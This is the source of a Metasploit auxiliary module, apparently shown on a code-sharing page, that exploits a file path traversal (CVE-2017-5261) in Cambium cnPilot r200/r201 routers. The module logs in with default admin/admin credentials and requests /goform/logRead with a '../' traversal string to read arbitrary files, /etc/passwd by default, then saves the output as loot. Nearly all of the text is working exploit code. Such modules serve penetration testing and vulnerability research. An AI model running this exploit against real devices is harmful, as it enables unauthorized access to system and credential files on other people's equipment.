Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Auxiliary::CNPILOT
8

9
  def initialize(info = {})
10
    super(
11
      update_info(
12
        info,
13
        'Name' => 'Cambium cnPilot r200/r201 File Path Traversal',
14
        'Description' => %q{
15
          This module exploits a File Path Traversal vulnerability in Cambium
16
          cnPilot r200/r201 to read arbitrary files off the file system. Affected
17
          versions - 4.3.3-R4 and prior.
18
        },
19
        'Author' => [
20
          'Karn Ganeshen <KarnGaneshen[at]gmail.com>'
21
        ],
22
        'References' => [
23
          ['CVE', '2017-5261'],
24
          ['URL', 'https://www.rapid7.com/blog/post/2017/12/19/r7-2017-25-cambium-epmp-and-cnpilot-multiple-vulnerabilities/']
25
        ],
26
        'License' => MSF_LICENSE
27
      )
28
    )
29

30
    register_options(
31
      [
32
        OptInt.new('TIMEOUT', [true, 'HTTP connection timeout', 10]),
33
        Opt::RPORT(80),	# Application may run on a different port too. Change port accordingly.
34
        OptString.new('USERNAME', [false, 'A specific username to authenticate as', 'admin']),
35
        OptString.new('PASSWORD', [false, 'A specific password to authenticate with', 'admin']),
36
        OptString.new('FILENAME', [true, 'Filename to read', '/etc/passwd'])
37
      ], self.class
38
    )
39

40
    deregister_options('DB_ALL_CREDS', 'DB_ALL_PASS', 'DB_ALL_USERS', 'USER_AS_PASS', 'USERPASS_FILE', 'USER_FILE', 'PASS_FILE', 'BLANK_PASSWORDS', 'BRUTEFORCE_SPEED', 'STOP_ON_SUCCESS')
41
  end
42

43
  def run_host(_ip)
44
    unless is_app_cnpilot?
45
      return
46
    end
47
  end
48

49
  #
50
  # Read file
51
  #
52

53
  def read_file(the_cookie)
54
    print_status("#{rhost}:#{rport} - Accessing the file...")
55
    file = datastore['FILENAME']
56
    fileuri = "/goform/logRead?Readfile=../../../../../../..#{file}"
57
    final_url = (ssl ? 'https' : 'http').to_s + '://' + "#{rhost}:#{rport}" + fileuri.to_s
58

59
    res = send_request_cgi(
60
      {
61
        'uri' => fileuri,
62
        'method' => 'GET',
63
        'cookie' => the_cookie,
64
        'headers' => {
65
          'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
66
        }
67
      }
68
    )
69

70
    if res && res.code == 200
71
      results = res.body
72

73
      if results.empty?
74
        print_status('File not found.')
75
      else
76
        print_good(results.to_s)
77

78
        # w00t we got l00t
79
        loot_name = 'fpt-log'
80
        loot_type = 'text/plain'
81
        loot_desc = 'Cambium cnPilot File Path Traversal Results'
82
        data = results.to_s
83
        p = store_loot(loot_name, loot_type, datastore['RHOST'], data, loot_desc)
84
        print_good("File saved in: #{p}")
85
      end
86
    else
87
      print_error("#{rhost}:#{rport} - Could not read file. You can manually check by accessing #{final_url}.")
88
      return
89
    end
90
  end
91

92
  #
93
  # Login & initiate file read
94
  #
95

96
  def run_login
97
    cookie, _version = do_login(datastore['USERNAME'], datastore['PASSWORD'])
98
    if cookie == 'skip'
99
      return
100
    else
101
      read_file(cookie)
102
    end
103
  end
104
end
105

106